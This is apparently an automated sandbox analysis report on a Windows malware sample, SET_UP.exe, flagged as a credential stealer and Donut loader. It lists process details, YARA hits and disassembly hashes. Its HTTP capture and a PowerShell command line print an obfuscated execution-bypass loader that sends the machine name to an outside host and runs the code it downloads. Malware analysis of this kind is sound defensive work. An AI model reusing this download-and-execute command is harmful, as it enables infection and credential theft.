                                                                                                                                                            2025-01-07 13:48:36 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                            Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:08:48:05
                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                            Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:75'071'589 bytes
                                                                                                                                                            MD5 hash:0F91B9310E783C23ADA7D4C31C89BE4B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1946741383.0000000000908000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:08:48:35
                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:08:48:35
                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 04EF48E0 Relevance: 3.0, Strings: 2, Instructions: 453COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^
                                                                                                                                                              • API String ID: 0-4019632981
                                                                                                                                                              • Opcode ID: 61737c6241158219ab4bc6068ec57a81c5aa61e280f793f3dd93323a2065cccf
                                                                                                                                                              • Instruction ID: e715d65302a7f1e592b5834984a2e5f12cd5ca4e978294475c4db47871bcac8a
                                                                                                                                                              • Opcode Fuzzy Hash: 61737c6241158219ab4bc6068ec57a81c5aa61e280f793f3dd93323a2065cccf
                                                                                                                                                              • Instruction Fuzzy Hash: 10028E31A093949FDB02DF68D890ADEBFB1EF46314F198096D484DB2A2D734EC85CB91
                                                                                                                                                              Function 04EF2A90 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^
                                                                                                                                                              • API String ID: 0-492403686
                                                                                                                                                              • Opcode ID: 73df8d58bb46730b58ac6cd3c7e01f873f067827da11e5d9be28bcfc247c67e8
                                                                                                                                                              • Instruction ID: 81262cf278e92fb73d812d2210e03c87d55064e69a41eb45f078ea1145db1cc6
                                                                                                                                                              • Opcode Fuzzy Hash: 73df8d58bb46730b58ac6cd3c7e01f873f067827da11e5d9be28bcfc247c67e8
                                                                                                                                                              • Instruction Fuzzy Hash: 6331A074A042159FCB01CF59C8849AEFBB1FF49310B5485AAE949EB352C735FC41CBA0
                                                                                                                                                              Function 04EF2F58 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8de4616f98e5823520e372207f19b3324d12fbcec077d9571d62081f2abf112c
                                                                                                                                                              • Instruction ID: 43717d575f6df615c80b467f9be90780f690ec6ec3432d72198a426f82f323e0
                                                                                                                                                              • Opcode Fuzzy Hash: 8de4616f98e5823520e372207f19b3324d12fbcec077d9571d62081f2abf112c
                                                                                                                                                              • Instruction Fuzzy Hash: 06124D74A012499FCB05CF98C984AAEFBB2FF48314F258599E905AB365C735FD81CB90
                                                                                                                                                              Function 07A31B1D Relevance: .1, Instructions: 137COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d3ba048571efcf2f005b1e3ad561c9287f4538cd4c3d6c1fd879ad96e82535b5
                                                                                                                                                              • Instruction ID: c1973b666aa6c05db7334f25f0c834dd8e6f29f3dc95664a4bad230558729e3d
                                                                                                                                                              • Opcode Fuzzy Hash: d3ba048571efcf2f005b1e3ad561c9287f4538cd4c3d6c1fd879ad96e82535b5
                                                                                                                                                              • Instruction Fuzzy Hash: 8841A2F17006189BCB259F78D8456AEBFA29FD1358B1444AEF5119F351EE35D802C3E2
                                                                                                                                                              Function 04EF33D0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 614865f7f27a517b2f989883f8d5c6918fdddd9fa5ff8803dd23a4767cd952a4
                                                                                                                                                              • Instruction ID: 8de089bf8aa74168f1330523b3ba208946f044ba4573957e0da2cd72e82c0292
                                                                                                                                                              • Opcode Fuzzy Hash: 614865f7f27a517b2f989883f8d5c6918fdddd9fa5ff8803dd23a4767cd952a4
                                                                                                                                                              • Instruction Fuzzy Hash: EF4138B4A005059FCB1ACF98C5949AAFBB1FF48310B158599D905AB364C736FD51CFA0
                                                                                                                                                              Function 04EF33E0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1b81e51218b594ff39513ed23d06e850e88ef9771320e53d69876bf230e94086
                                                                                                                                                              • Instruction ID: 13a662655aff571eefb5293be808a97c76818188f7c5e492f5e8fb84d959d8da
                                                                                                                                                              • Opcode Fuzzy Hash: 1b81e51218b594ff39513ed23d06e850e88ef9771320e53d69876bf230e94086
                                                                                                                                                              • Instruction Fuzzy Hash: C74137B4A005059FCB19CF98C5949AEFBB1FF88314B118669DA05AB364C736FD50CFA0
                                                                                                                                                              Function 04EF2A80 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d0bdc998005df21d036c948c1d5f327227d3006e79cf2e99c06656e68f3b1c01
                                                                                                                                                              • Instruction ID: 83bdd56133b9741f5dcc42d3c3bf7f0b641cab8513193d7e811c86e0a4a86ec9
                                                                                                                                                              • Opcode Fuzzy Hash: d0bdc998005df21d036c948c1d5f327227d3006e79cf2e99c06656e68f3b1c01
                                                                                                                                                              • Instruction Fuzzy Hash: 6421E7B4A006159FCB04CF59C9849AAFBF1FF4C310B1585A9E909EB365C731EC41CBA0
                                                                                                                                                              Function 04EF48D0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 19cdf9e8bb5ba99f33dd53252c2cf2cb88e3f6d8d6916e43cf4177994ebef88d
                                                                                                                                                              • Instruction ID: 2e1095a611c48add03a2c0ff83f9eb80aeef8d7c08ba49bf55cc9ccb9b09e4e2
                                                                                                                                                              • Opcode Fuzzy Hash: 19cdf9e8bb5ba99f33dd53252c2cf2cb88e3f6d8d6916e43cf4177994ebef88d
                                                                                                                                                              • Instruction Fuzzy Hash: F5215C74A052599FCB00CF9CD880DAEFBB0FF89310B148599E949AB352C331ED41CBA1
                                                                                                                                                              Function 0301D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2053595200.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e5e7ad35c42ef0743bff086bc9c8ece9371fd8d6cad699dd92a439846bf01a85
                                                                                                                                                              • Instruction ID: 3230af72e17fb1a26e5bc5fc49ab34c0dc465ba114a507f76f7b31e67c30b37f
                                                                                                                                                              • Opcode Fuzzy Hash: e5e7ad35c42ef0743bff086bc9c8ece9371fd8d6cad699dd92a439846bf01a85
                                                                                                                                                              • Instruction Fuzzy Hash: 2401847140A3409AE7518A2AC98477BBFD8EF41364F1CC56AED484A146C679D851C6B1
                                                                                                                                                              Function 0301D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2053595200.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5f619d0a21a1768d320918c8bf90d0361ff71479b2282e9bd1328fba82aed4b3
                                                                                                                                                              • Instruction ID: a6571f23daf66e986264928e92d4d10b876d4d36cad34eec620be23d7ed3caf3
                                                                                                                                                              • Opcode Fuzzy Hash: 5f619d0a21a1768d320918c8bf90d0361ff71479b2282e9bd1328fba82aed4b3
                                                                                                                                                              • Instruction Fuzzy Hash: D201407240E3C09ED7128B25CC94B62BFB8EF43224F1D80CBD9888F1A7C2699845C772

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 04EF170D Relevance: 11.4, Strings: 9, Instructions: 100COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-3443393009
                                                                                                                                                              • Opcode ID: 8daae4c7e52474d955427e617f867401baaba4f8ee7a5c1f93a84eb83a1dc8d0
                                                                                                                                                              • Instruction ID: ccad492d2ce659d0e1d62e40168785c15fe8e337eb73e1687d6d8919058f63c2
                                                                                                                                                              • Opcode Fuzzy Hash: 8daae4c7e52474d955427e617f867401baaba4f8ee7a5c1f93a84eb83a1dc8d0
                                                                                                                                                              • Instruction Fuzzy Hash: 5931716290D7C64FD7035B289DA51C17F70AF23295F4E04D3CCE08F1A7EA585A2E8766
                                                                                                                                                              Function 04EF0C62 Relevance: 10.1, Strings: 8, Instructions: 92COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-4041699907
                                                                                                                                                              • Opcode ID: a932ee5b5cda6d877962d155998b7b15772a1cfa55cfc009c448af8cd6049543
                                                                                                                                                              • Instruction ID: 351dc5b588a31e65c775d6ead505fc2c9eec686a3061ae07f99ee0766daa3e97
                                                                                                                                                              • Opcode Fuzzy Hash: a932ee5b5cda6d877962d155998b7b15772a1cfa55cfc009c448af8cd6049543
                                                                                                                                                              • Instruction Fuzzy Hash: C321803190E7D44FD7135B289DB82817F70AF03295B4E00D3CDE08F0A7E968592987A6
                                                                                                                                                              Function 04EF393D Relevance: 7.6, Strings: 6, Instructions: 87COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-4289189412
                                                                                                                                                              • Opcode ID: e94dfc2ef5a8e731f6ba8d4672ed1112d928ee5dbb088b4f48acea8fcfedbc07
                                                                                                                                                              • Instruction ID: dbef60a64370296d317cfbd2c0064c180514f6deaa3a05f93f186f777dc69715
                                                                                                                                                              • Opcode Fuzzy Hash: e94dfc2ef5a8e731f6ba8d4672ed1112d928ee5dbb088b4f48acea8fcfedbc07
                                                                                                                                                              • Instruction Fuzzy Hash: C821AF2194E7D10FD7035B28ADA50D57F309F532A0B4E04E7CDD0CF9A7E9084A4E87A6
                                                                                                                                                              Function 04EF13B3 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-1825230704
                                                                                                                                                              • Opcode ID: 0080a255e04ba04921ab7f04b29466ec6fc4cecf5b2dde55e268fb22df98de4f
                                                                                                                                                              • Instruction ID: 3890a17f1544e5cc62bc49a11194609c2c6704e4bf9277f2b6c37f952b2d800a
                                                                                                                                                              • Opcode Fuzzy Hash: 0080a255e04ba04921ab7f04b29466ec6fc4cecf5b2dde55e268fb22df98de4f
                                                                                                                                                              • Instruction Fuzzy Hash: AE31BD2284E7E05FD727AB789DB01963FB08E1326470A00E3C8D0CF1B7E558599EC7A6
                                                                                                                                                              Function 07A33988 Relevance: 5.3, Strings: 4, Instructions: 329COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                                              • API String ID: 0-3859475322
                                                                                                                                                              • Opcode ID: aa2720c29eac6f399004711e98720d082a222772c8541ed4d40477f1a2c963aa
                                                                                                                                                              • Instruction ID: 61054cc268e697a239c34633db79b302ea52ad5de260dfe9642ad49bb8a45a3b
                                                                                                                                                              • Opcode Fuzzy Hash: aa2720c29eac6f399004711e98720d082a222772c8541ed4d40477f1a2c963aa
                                                                                                                                                              • Instruction Fuzzy Hash: 9BB148B170C2458FCB149F69981566ABFE2AFC6220F1484BBE526CF351DE32DC46C7A1
                                                                                                                                                              Function 07A33518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                              • Opcode ID: 673e56a56cce6dd1ed3eae053a6c7a76d9108424bcb80ad53dae222377b2e693
                                                                                                                                                              • Instruction ID: a414acdf29063e6204ed8b491cf7503946a6cd5dac51132d79652fe79b67d533
                                                                                                                                                              • Opcode Fuzzy Hash: 673e56a56cce6dd1ed3eae053a6c7a76d9108424bcb80ad53dae222377b2e693
                                                                                                                                                              • Instruction Fuzzy Hash: 222124B17083069FDF385E6A9805B37AEEA9BC0714F24842BF51ACF385DD76D8448361
                                                                                                                                                              Function 07A30572 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                              • Opcode ID: d34df8468e9e7631d1ef7b1d9eb14a840ca8890981cd9f033157a61422bea3ad
                                                                                                                                                              • Instruction ID: 7a5cfc342ed67f435f4be7d14adac52a53d656ab988d46b0ec37a9101140afac
                                                                                                                                                              • Opcode Fuzzy Hash: d34df8468e9e7631d1ef7b1d9eb14a840ca8890981cd9f033157a61422bea3ad
                                                                                                                                                              • Instruction Fuzzy Hash: 7D01D4A0B093894FC72A4F3818246566FB35FD3510B1944EBE091CF396CD298C498392